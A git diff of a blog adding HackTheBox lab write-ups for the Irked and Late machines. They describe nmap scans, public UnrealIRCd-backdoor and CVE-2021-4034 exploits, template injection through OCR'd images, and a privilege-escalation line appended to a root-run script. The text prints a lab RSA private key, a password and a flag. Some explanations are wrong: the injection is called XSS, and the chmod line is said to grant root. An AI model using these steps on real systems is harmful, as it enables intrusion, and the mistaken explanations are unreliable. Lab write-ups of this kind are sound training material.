b/content/writeup-ctf/writeup-irked-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8f341f3485ced0db32ee2f85064a8dd570412f4b0bd5670a15d26e6a9facb87 +size 3390 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-11.png b/content/writeup-ctf/writeup-irked-htb/img/image-11.png new file mode 100644 index 0000000..2f37958 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:28a7a929efc2145790e4d22e48e26cade4588e3e6e68e0e665dbaec2a2058e13 +size 49910 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-11.webp b/content/writeup-ctf/writeup-irked-htb/img/image-11.webp new file mode 100644 index 0000000..6728078 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17988624623d280656f10961ee7f4f0dac6f6cb777b0de8156cca00d108ec195 +size 46436 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-2.png b/content/writeup-ctf/writeup-irked-htb/img/image-2.png new file mode 100644 index 0000000..6a20a70 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c815b66d881c923df102192e206b9f84392df867a8bb3f7ee002cdc692fc053d +size 265177 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-2.webp b/content/writeup-ctf/writeup-irked-htb/img/image-2.webp new file mode 100644 index 0000000..ad34af3 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b405882f15a534b36c1da13bf8909cb57ec99bad3119b9ba10470b506d72998 +size 28780 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-3.png b/content/writeup-ctf/writeup-irked-htb/img/image-3.png new file mode 100644 index 0000000..b9bb470 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:986310b1235f0cee4dada10549b4f402e020ae2b02de9f9a7a05b0bb69301ed8 +size 14940 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-3.webp b/content/writeup-ctf/writeup-irked-htb/img/image-3.webp new file mode 100644 index 0000000..4a2fdb6 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:417f8e248aab6901fb41d14915eb8b9616b15ce67628c2e4ad72249f9d394ba1 +size 11358 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-4.png b/content/writeup-ctf/writeup-irked-htb/img/image-4.png new file mode 100644 index 0000000..27f464c --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:56a7d7c52f778e9130fec976a7e4681f9113ad84d4e8974979028302a5487f55 +size 57453 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-4.webp b/content/writeup-ctf/writeup-irked-htb/img/image-4.webp new file mode 100644 index 0000000..702953e --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9baba3099fc41c1eb04dd624364e20b75dc62bba43722e076da058cec31702bc +size 47106 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-5.png b/content/writeup-ctf/writeup-irked-htb/img/image-5.png new file mode 100644 index 0000000..b3d0a80 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba56559e2f31aab2fd221297421d1e12ad92de2471e6bedbcc6033b5c25822a0 +size 8600 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-5.webp b/content/writeup-ctf/writeup-irked-htb/img/image-5.webp new file mode 100644 index 0000000..774e10b --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2f9ccb18887cf2d15243e30857983ef21f032c6854ea63c4a2818d9603320a34 +size 6498 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-6.png b/content/writeup-ctf/writeup-irked-htb/img/image-6.png new file mode 100644 index 0000000..2df1ea9 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14012d2bd6bbc37f4a8c2e4d67c215b681018f21dc3df2686086f2d97b564e0e +size 10930 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-6.webp b/content/writeup-ctf/writeup-irked-htb/img/image-6.webp new file mode 100644 index 0000000..b182676 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:258d6a332ffa18403bbc86cf4be49a52d297ff20e135ad1a927729770ca93024 +size 10934 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-7.png b/content/writeup-ctf/writeup-irked-htb/img/image-7.png new file mode 100644 index 0000000..da1a1ee --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76058216c0d83a6d9df2b96888dcf4922207f0589c8c542d77ac4b5f546b3ed7 +size 16206 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-7.webp b/content/writeup-ctf/writeup-irked-htb/img/image-7.webp new file mode 100644 index 0000000..ef1e142 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67d63ce3519500bb0e9f7ed86b61a7a3a608a31dc2ea0bb309d6bac4c49f2928 +size 23170 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-8.png b/content/writeup-ctf/writeup-irked-htb/img/image-8.png new file mode 100644 index 0000000..602c080 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df55203ce2b07b366aab458cb12ddfc5ea833d62f4144e69b45ebaf077aba5de +size 9970 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-8.webp b/content/writeup-ctf/writeup-irked-htb/img/image-8.webp new file mode 100644 index 0000000..b4dfc73 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:70bc5e95e1a9db5683c619dd571da8a57b656522a1556b525a207af39acdf576 +size 7388 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-9.png b/content/writeup-ctf/writeup-irked-htb/img/image-9.png new file mode 100644 index 0000000..66ea995 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ab88cd87c4ffd550754d697d8d93e81de87ce310f3edc60f3d6ca1af65f8823 +size 41862 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-9.webp b/content/writeup-ctf/writeup-irked-htb/img/image-9.webp new file mode 100644 index 0000000..e27596d --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0622f28cf723787893b5747a4db631e9fe3fa3402401e7321829a42b3a6131c2 +size 57106 diff --git a/content/writeup-ctf/writeup-irked-htb/index.md b/content/writeup-ctf/writeup-irked-htb/index.md new file mode 100644 index 0000000..4731552 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/index.md @@ -0,0 +1,97 @@ +--- +title: "Writeup - Irked (HTB)" +date: 2022-05-24 +slug: "writeup-irked-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Irked](https://app.hackthebox.com/machines/Irked) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Many TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2) +- 80/tcp : HTTP web server (Apache 2.4.41) +- 111/tcp : rpcbind +- 6697/tcp : IRC (UnrealIRCd) +- 8067/tcp : IRC (UnrealIRCd) +- 52411/tcp : Status +- 65534/tcp : IRC (UnrealIRCd) + +![](img/image-2.webp) + +## Exploit + +Following the nmap scan I notice that there is the port 65534 open with the UnrealIRC service. After some research on google I find that there is a big exploit for version 3.2.8.1. Before doing anything else I start by testing this exploit. I search the module in Metasploit : + +![](img/image-3.webp) + +Then after setting the options I launch the exploit: + +![](img/image-4.webp) + +Without success, but it's weird it's an error related to a setting and not a problem related to the target, so I try a second version that I find on github: [UnrealIRCd-3.2.8.1-Backdoor](https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor) + +After adding my IP/Port in the file, I launch the exploit with the following command: + +![](img/image-5.webp) + +After a few seconds I now have a reverse shell as ircd. + +![](img/image-6.webp) + +I don't have the permissions to read the first flag, but I find a hidden `.backup` file I can consult: + +![](img/image-7.webp) + +In this file a sentence and what could look like a password. In the sentence it is referred to steganography. + + +> Steganography  is the practice of concealing a message within another message or a physical object. In computing/electronic contexts, a computer file, message, image, or video is concealed within another file, message, image, or video. + +The only image we've come across so far is on the site of the beginning of the machine. I download it and use [steghide](https://0xrick.github.io/lists/stego/#steghide) with the password I found. + +![](img/image-8.webp) + +I manage to extract a `pass.txt` file! In this file I find the following password : + + +```bash +Kab6h+m+bbp2J:HG +``` +So I try to connect via SSH to the user `djmardov` : + +![](img/image-9.webp) + +I now have a shell with the user `djmardov` and I can get the first flag. + +## Privilege escalation + +I start by running a [linpeas.sh](https://linpeas.sh) scan. + +![](img/image-10.webp) + +Quickly I find that the machine is vulnerable to CVE-2021-4034. So I will use the following [CVE-2021-4034 Github](https://github.com/berdav/CVE-2021-4034) exploit. + +After downloading the different files, I compile the code with `make`, then I launch the program. + +![](img/image-11.webp) + +I now have a `root` shell and can retrieve the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update UnrealIRC to fix the exploit +- Do not store clear passwords in a file +- Update Linux to fix CVE-2021-4034 diff --git a/content/writeup-ctf/writeup-late-htb/featured.png b/content/writeup-ctf/writeup-late-htb/featured.png new file mode 100644 index 0000000..8ebe7ce --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c8bfc06e2aed14b2d8d07b2cbece57b69301ece8e4dc03670a1ce144d6515fd +size 207942 diff --git a/content/writeup-ctf/writeup-late-htb/featured.webp b/content/writeup-ctf/writeup-late-htb/featured.webp new file mode 100644 index 0000000..a5ee470 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3bf9d37da11370569f98ab8c5bf516d5e70e7012a812e69ad4eb88c25cda4766 +size 20012 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-1.png b/content/writeup-ctf/writeup-late-htb/img/image-1.png new file mode 100644 index 0000000..e26e11f --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad525c4be0f05c98c2c1d9ae69d1d07bdb5561e439e95f82e854afa2bc324772 +size 35889 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-1.webp b/content/writeup-ctf/writeup-late-htb/img/image-1.webp new file mode 100644 index 0000000..699f2bb --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c3290f8978efc267ac4fd6d918e09879526af45190795715ee791c962d7a572c +size 34476 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-10.png b/content/writeup-ctf/writeup-late-htb/img/image-10.png new file mode 100644 index 0000000..fb8f496 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:39557633a105fae22b8b91eb20a2aec9c6ba6fd2b9dda993accc7a2d52af25af +size 27288 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-10.webp b/content/writeup-ctf/writeup-late-htb/img/image-10.webp new file mode 100644 index 0000000..323b257 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7db8e4cc4d133bbfea60335ed144395afb589fee089da1f6575580592975bb96 +size 27602 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-11.png b/content/writeup-ctf/writeup-late-htb/img/image-11.png new file mode 100644 index 0000000..42f6fbc --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b1f3e92cb1e9ac76c0abef48a1b0ba4405b69e6684849ff5bdd0507a056008f1 +size 3809 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-11.webp b/content/writeup-ctf/writeup-late-htb/img/image-11.webp new file mode 100644 index 0000000..56a897c --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee6bb0cf5c45c812de9d7c83c3cb353570e10a8b8ffe32fdf34abc46e0065b28 +size 2980 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-12.png b/content/writeup-ctf/writeup-late-htb/img/image-12.png new file mode 100644 index 0000000..d94d245 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:936c8d193abd91970f7cfd9af1ba78a7073caebf1191aae799c86e957e76b5b2 +size 35866 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-12.webp b/content/writeup-ctf/writeup-late-htb/img/image-12.webp new file mode 100644 index 0000000..aa1146e --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a5e195aaad6c1531a714719469d0ce0f75159ccd92a50709cb88e8f9ca2907f +size 35318 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-13.png b/content/writeup-ctf/writeup-late-htb/img/image-13.png new file mode 100644 index 0000000..fa36aa0 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d67d7c17d1c8762178206e6f96ae53ccf74051e33838132151148609a04b78de +size 6707 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-13.webp b/content/writeup-ctf/writeup-late-htb/img/image-13.webp new file mode 100644 index 0000000..66986c7 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a30114603b0fd9e7749900f76e474f5c9d2ae121d329612bf648953d9e424fe +size 7848 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-2.png b/content/writeup-ctf/writeup-late-htb/img/image-2.png new file mode 100644 index 0000000..238f704 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:13097dfcd6e3ee2a81ab0be2744ff77ce9ec9265118eca658f92ea5bbedad485 +size 762949 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-2.webp b/content/writeup-ctf/writeup-late-htb/img/image-2.webp new file mode 100644 index 0000000..b885178 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7627941e43f2c35ed4d3c0702f02255edf5c19e47efdbf8795577ffcfbb85a82 +size 98682 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-3.png b/content/writeup-ctf/writeup-late-htb/img/image-3.png new file mode 100644 index 0000000..e7bc91f --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2513dedd6528fb26c8d11887464e1774c202c1a0a8c4614184b66baa6cac5104 +size 46214 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-3.webp b/content/writeup-ctf/writeup-late-htb/img/image-3.webp new file mode 100644 index 0000000..645734d --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:31984e9df97a16471132705223df00417e01ef75ee743005880562377e133337 +size 40932 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-4.png b/content/writeup-ctf/writeup-late-htb/img/image-4.png new file mode 100644 index 0000000..10be5b5 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f46c8c938bc88bb9b18a7dcf34a45a6e1bef7b351ba88fe7a8eda99ff772c5b4 +size 50750 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-4.webp b/content/writeup-ctf/writeup-late-htb/img/image-4.webp new file mode 100644 index 0000000..a187a38 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:751b5654a8f03ff6841849f97a3235a6eb4be2082300d17051da8e2e52c58df9 +size 50222 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-5.png b/content/writeup-ctf/writeup-late-htb/img/image-5.png new file mode 100644 index 0000000..8d3549b --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8e7b569d8005d9d1c6e4add2c1b510ffdc2fc706d9e5c71d4edbda53f4da6df +size 46065 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-5.webp b/content/writeup-ctf/writeup-late-htb/img/image-5.webp new file mode 100644 index 0000000..40e620f --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c6ba8b8bb7543dfb797d9649c1d6e947c0e079b5d46734dcb890d5759e365f6c +size 36904 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-6.png b/content/writeup-ctf/writeup-late-htb/img/image-6.png new file mode 100644 index 0000000..fec4f1d --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d34d8aec28cb840840879b9c808b04682950465165913872a72675810f73f7f +size 39767 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-6.webp b/content/writeup-ctf/writeup-late-htb/img/image-6.webp new file mode 100644 index 0000000..3b1d03f --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30e909c8930dffb1388f6d849c5907087c034ea0dc3e089d6572a6998ba3d03d +size 23692 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-7.png b/content/writeup-ctf/writeup-late-htb/img/image-7.png new file mode 100644 index 0000000..b20910e --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0e6f1f901834ca94b5749fab7eb123b1b413a2d8e1d1372b5e4f31bd94898ff0 +size 2421 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-7.webp b/content/writeup-ctf/writeup-late-htb/img/image-7.webp new file mode 100644 index 0000000..389d251 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d53e2a52449fd49e562a58f4674c8581c11bfd5c31b7e1ff4d9d32e83f0c44c +size 2180 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-8.png b/content/writeup-ctf/writeup-late-htb/img/image-8.png new file mode 100644 index 0000000..9a92137 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:40b12ed439b1686b09b566184da8d7fff7bc069bdc3bc1a0b95087684eafa9a7 +size 9039 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-8.webp b/content/writeup-ctf/writeup-late-htb/img/image-8.webp new file mode 100644 index 0000000..9caf0f7 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:802bdbb02696148380ed6f5ac2f031eddd12576ad4b35a8feedc6ce25cd965f0 +size 12148 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-9.png b/content/writeup-ctf/writeup-late-htb/img/image-9.png new file mode 100644 index 0000000..9cc8961 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02db7f024e1dff7517ed3aa21c989f01464a513c0b519a8c4ce7ca08dd86e232 +size 10881 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-9.webp b/content/writeup-ctf/writeup-late-htb/img/image-9.webp new file mode 100644 index 0000000..222b991 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1867d5ddadf9b6cf23c42cebf54675dbdeb0b76791803db24e700cdf9852fc20 +size 15606 diff --git a/content/writeup-ctf/writeup-late-htb/index.md b/content/writeup-ctf/writeup-late-htb/index.md new file mode 100644 index 0000000..c0f6386 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/index.md @@ -0,0 +1,146 @@ +--- +title: "Writeup - Late (HTB)" +date: 2022-04-25 +slug: "writeup-late-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Late](https://app.hackthebox.com/machines/Late) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.129.45.153 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server (nginx 1.14.0) + +![](img/image-2.webp) + +## Exploit + +First of all, let's start with the enumeration of the site's files. + +![](img/image-3.webp) + +![](img/image-4.webp) + +After some research in the results nothing very interesting in this site. So I scan the subdomains. + +![](img/image-5.webp) + +I find the `images` subdomain. I add it in the `/etc/hosts` file, then I go to the site. + +![](img/image-6.webp) + +It is a site that allows to recover text present in an image and to send it back in a file. For that there is a treatment, in particular of the recognition of character. But is there any additional processing? + +After some unsuccessful tests I try to perform an XSS (Cross Site Scripting). To try to determine if there is indeed a possibility to do it. I send the following image to the server: + +![](img/image-7.webp) + +Depending on the answer I will be able to determine if this attack is feasible and also potentially this Framework is used: + +- 777777 -> Jinja2 +- 49 -> Twig + + +```bash +┌──(d3vyce㉿kali)-[~/Downloads] +└─$ cat results.txt +

7777777 +

+``` +After retrieving the result file we find the answer `7777777`. The XSS is therefore possible and the framework has a great chance to be Jinja2! I go to the following [github](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2) to see the possibilities. + +I first try to send the following image: + +![](img/image-8.webp) + + +```bash +┌──(d3vyce㉿kali)-[~/Downloads] +└─$ cat results.txt +

uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc) + +

+``` +In the result file I find the expected result, the web application is executed as `svc_acc`. I now try to see if this user has an RSA key that would allow me to connect via SSH: + +![](img/image-9.webp) + + +```bash +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM +HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO +bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi +/mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7 +d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7 +7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM +fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0 +ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz +W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ +uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC +T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH +Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi +WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng +Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7 +t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq +0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE +uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y +3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ +GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F +ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb +Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr +kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+ +Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL +K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0 +kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw== +-----END RSA PRIVATE KEY----- +``` +Now that I have the RSA key in my possession, I can connect in SSH and get the first flag : + +![](img/image-10.webp) + +## Privilege escalation + +To start I run the [linpeas.sh](https://linpeas.sh) script to get an idea of what is present on the machine. Quickly I find a script `ssh-alert.sh` which is a script belonging to my user, but which is executed by root. + +![](img/image-11.webp) + +I look at its contents and find that it is a script that generates an alert by mail for each session opened via SSH. + +![](img/image-12.webp) + +Knowing that I can modify it, I add the following line at the end of the file. + + +```bash +echo "chmod o+x /bin/bash" >> ssh-alert.sh +``` +This allows to add to the file a `euid = 0`, which will allow me to execute the script as root. This is the same principle that is used with the su command. I quit the ssh session, I restart it, then I create a bash session with the following command : + +![](img/image-13.webp) + +I am now root of the machine and I can recover the last flag. + + +```bash +bash-4.4# cat /root/root.txt +0abb3c1b4d046ab54e80851cf85c6448 +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update the image converter to avoid XSS +- Launch web applications with a user with minimum rights and no RSA key +- Do not let a user-modifiable script be executed by root diff --git a/content/writeup-ctf/writeup-meta-htb/featured.png b/content/writeup-ctf/writeup-meta-htb/featured.png new file mode 100644 index 0000000..2fa0036 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d9b123f854cdaf0913e5181bec013df3118a41e734675bfb5c01049f44a24ff0 +size 335341 diff --git a/content/writeup-ctf/writeup-meta-htb/featured.webp b/content/writeup-ctf/writeup-meta-htb/featured.webp new file mode 100644 index 0000000..2a955ac --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5254672588d76561ea4bc601be5938911792e346ea958fae212fc5202e3eab66 +size 26222 diff --git a/content/writeup-ctf/writeup-meta-htb/img/image-1.png b/content/writeup-ctf/writeup-meta-htb/img/image-1.png new file mode 100644 index 0000000..eea9699 --- /dev/null +++ b/content/writeup-ctf/writeup-meta-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b7b5c689e473d8fbe5f38d56569bcc4ca6a0954cd219818717b3305fce1ff46a +size 